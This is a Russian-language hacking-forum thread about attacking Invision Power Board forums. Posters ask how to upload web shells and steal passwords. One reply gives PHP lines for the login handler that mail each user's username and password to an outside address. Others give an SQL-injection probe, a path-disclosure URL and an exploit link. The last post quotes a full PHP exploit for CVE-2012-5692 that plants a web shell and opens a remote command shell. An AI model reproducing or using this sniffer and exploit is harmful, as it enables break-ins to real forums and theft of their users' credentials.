Форумы [Обзор уязвимостей IPB]

Sirius05 · 28 Dec 2012

как применить эти две уязвимости дляя 3.3х не подскажите

Revi · 5 Jan 2013

Кто знает как залить шелл на IP.Board 3.3.3?

ph1l1ster · 28 Jan 2013

Привет всем! Возможно както залить шелл имея права модера?

BigBear · 28 Jan 2013

ph1l1ster said:

Привет всем! Возможно както залить шелл имея права модера?
Click to expand...

Можно при условии, что Вас пускает в администраторскую панель с модераторскими правами.

ph1l1ster · 28 Jan 2013

BigBear said:

Можно при условии, что Вас пускает в администраторскую панель с модераторскими правами.
Click to expand...

К сожалению нет. В папке с админкой .htaccess и доступ только для определенных IP
Через аттачи не? Заливается но не выполняется. lfi нет

korp · 9 Feb 2013

-=lebed=- said:

Invision Power Board <= 3.3.4 unserialize Regex Bypass

Click to expand...

Подскажите пример использования, весь мозг себе вынес.

CoBecTb · 14 May 2013

Имею полный доступ к ipb 3.4.2, хочу поставить сниффер для отправки паролей на майл, или сохранения в файл, кому не сложно скиньте и объясните как установить и куда. Заранее благодарю.

Unknowhacker · 29 May 2013

Мужики, а есть эксплоит под версию 3.4.4

P.S Выдало ошибку PB Предупреждение [2] mysql_connect() [function.mysql-connect]: [2002] No connection could be made because the target machine actively refused it. (trying to connect via tcp://localhost:3306) (Строка: 141 файла \ips_kernel\class_db_mysql.php)
IPB Предупреждение [2] mysql_connect() [function.mysql-connect]: No connection could be made because the target machine actively refused it. (Строка: 141 файла \ips_kernel\class_db_mysql.php)

Br@!ns · 25 Jun 2013

CoBecTb said:

Имею полный доступ к ipb 3.4.2, хочу поставить сниффер для отправки паролей на майл, или сохранения в файл, кому не сложно скиньте и объясните как установить и куда. Заранее благодарю.
Click to expand...

в файле /forum/sources/action_public/login.php или /forum/admin/sources/handlers/han_login.php не помню в какой версии какой путь. Сразу под строкой // Check auth вставляй следующее чтоб получилось так:
HTML:
$this->loginAuthenticate( $username, $email, $password );
$ipsclass_all = $username . ":" . $password;
mail('василийпупкин@gmail.com', '123', $ipsclass_all);

Unknowhacker · 28 Jul 2013

Короче на движке IPB, когда заходишь в любую тему, внизу выходит окно с ошибкой SQL:

P.S И собственно вопрос, можно как-нибудь пробить путь к таблицам

Inoms · 28 Jul 2013

Unknowhacker said:

Короче на движке IPB, когда заходишь в любую тему, внизу выходит окно с ошибкой SQL:

P.S И собственно вопрос, можно как-нибудь пробить путь к таблицам
Click to expand...

Если в урл, вместо ид топика поставь -1) -- - - что напишет ?

Unknowhacker · 29 Jul 2013

Inoms said:

Если в урл, вместо ид топика поставь -1) -- - - что напишет ?
Click to expand...

Сообщение форума

Обнаружена ошибка. Если вам неизвестны причины ошибки, попробуйте обратиться к разделам помощи.
Обнаружена ошибка:

Некоторые требуемые файлы отсутствуют. Если вы хотели просмотреть тему, возможно эта тема перемещена или удалена. Вернитесь назад и попробуйте снова.

P.S Т.е SQL ошибки нет.

miosaki · 1 Aug 2013

Ребята как узнать айпи адресс человека на IPB форуме?
http://iplogger.ru/1fFc3.jpg

а чо за айпи логгер?

zippy · 2 Aug 2013

Если на линейке 3.4.0 - 3.4.5 не стоит этот патч, то можно ли прочитать файлы форума через public/min/index.php?f=

Unknowhacker · 4 Aug 2013

Я так смотрю под версии 3.2.х вообще ничего нету, а если и есть, то работает на дырявых и заброшенных сайтах.

ForcePush · 1 Oct 2013

Path disclosure:
Code:
admin/upgrade/index.php?app=upgrade&s[]=&section=index&do=login
2 года назад пофиксили section[], может скоро и до s[] доберутся...

MarShaLL22 · 8 Nov 2013

Unknowhacker said:

Я так смотрю под версии 3.2.х вообще ничего нету, а если и есть, то работает на дырявых и заброшенных сайтах.
Click to expand...

IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover Published: 2013-05-14
http://www.exploit-db.com/exploits/25441/
Пробуй. Заодно, если получится, мануал накидай небольшой, будь добр.

sysjuk · 27 Nov 2015

Br@!ns said: ↑
в файле /forum/sources/action_public/login.php или /forum/admin/sources/handlers/han_login.php не помню в какой версии какой путь. Сразу под строкой // Check auth вставляй следующее чтоб получилось так:
HTML:
$this->loginAuthenticate( $username, $email, $password );
$ipsclass_all = $username . ":" . $password;
mail('василийпупкин@gmail.com', '123', $ipsclass_all);
Click to expand...
Ваш способ не работает, проверил только-что. Есть еще какие варианты?

Sensoft · 7 Sep 2016

На IP.Board 2.3.6 есть что нить ?

Deda_net · 4 Oct 2016

-=lebed=- said: ↑

Invision Power Board <= 3.3.4 unserialize Regex Bypass

PHP:

<?php /* So this is the patch that sanitizes, static public function safeUnserialize( $serialized ) { // unserialize will return false for object declared with small cap o // as well as if there is any ws between O and : if ( is_string( $serialized ) && strpos( $serialized, "\0" ) === false ) { if ( strpos( $serialized, 'O:' ) === false ) { // the easy case, nothing to worry about // let unserialize do the job return @unserialize( $serialized ); } else if ( ! preg_match('/(^|;|{|})O:[0-9]+:"/', $serialized ) ) { // in case we did have a string with O: in it, // but it was not a true serialized object return @unserialize( $serialized ); } } return false; } And this is what bypasses it ( By @i0n1c ) $payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}'); Which makes this an IPB 0day. lulz! - webDEViL */ /* ---------------------------------------------------------------- Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution ---------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: http://www.invisionpower.com/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php 4015. static public function get($name) 4016. { 4017. // Check internal data first 4018. if ( isset( self::$_cookiesSet[ $name ] ) ) 4019. { 4020. return self::$_cookiesSet[ $name ]; 4021. } 4022. else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) ) 4023. { 4024. $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ]; 4025. 4026. if ( substr( $_value, 0, 2 ) == 'a:' ) 4027. { 4028. return unserialize( stripslashes( urldecode( $_value ) ) ); 4029. } The vulnerability is caused due to this method unserialize user input passed through cookies without a proper sanitization. The only one check is done at line 4026, where is controlled that the serialized string starts with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable, for this reason successful exploitation of this vulnerability requires short_open_tag to be enabled. [-] Disclosure timeline: [21/10/2012] - Vulnerability discovered [23/10/2012] - Vendor notified [25/10/2012] - Patch released: http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update [25/10/2012] - CVE number requested [29/10/2012] - Assigned CVE-2012-5692 [31/10/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set('default_socket_timeout', 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+-----------------------------------+"; print "\n| Invision Power Board 0day Exploit |"; print "\n+-----------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /ipb/\n"; die(); } list($host, $path) = array($argv[1], $argv[2]); $packet = "GET {$path}index.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : ''; class db_driver_mysql { public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php'); } # Super bypass by @i0n1c $payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}'); $phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>'; $packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$_prefix}member_id={$payload}\r\n"; $packet .= "Connection: close\r\n\r\n"; http_send($host, $packet); $packet = "GET {$path}cache/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n"); while(1) { print "\nipb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>

(c) exploit-db.com
Click to expand...

Подскажите как юзать его?

Форумы [Обзор уязвимостей IPB]

Sirius05 New Member

Revi New Member

ph1l1ster Elder - Старейшина

BigBear Escrow Service
Staff Member Гарант - Escrow Service

ph1l1ster Elder - Старейшина

korp New Member

CoBecTb New Member

Unknowhacker Member

Br@!ns Elder - Старейшина

Unknowhacker Member

Inoms Member

Unknowhacker Member

miosaki New Member

zippy New Member

Unknowhacker Member

ForcePush New Member

MarShaLL22 New Member

sysjuk Member

Sensoft Member

Deda_net New Member

Useful Searches

Форумы [Обзор уязвимостей IPB]

Sirius05 New Member

Revi New Member

ph1l1ster Elder - Старейшина

BigBear Escrow Service Staff Member Гарант - Escrow Service

ph1l1ster Elder - Старейшина

korp New Member

CoBecTb New Member

Unknowhacker Member

Br@!ns Elder - Старейшина

Unknowhacker Member

Inoms Member

Unknowhacker Member

miosaki New Member

zippy New Member

Unknowhacker Member

ForcePush New Member

MarShaLL22 New Member

sysjuk Member

Sensoft Member

Deda_net New Member

BigBear Escrow Service
Staff Member Гарант - Escrow Service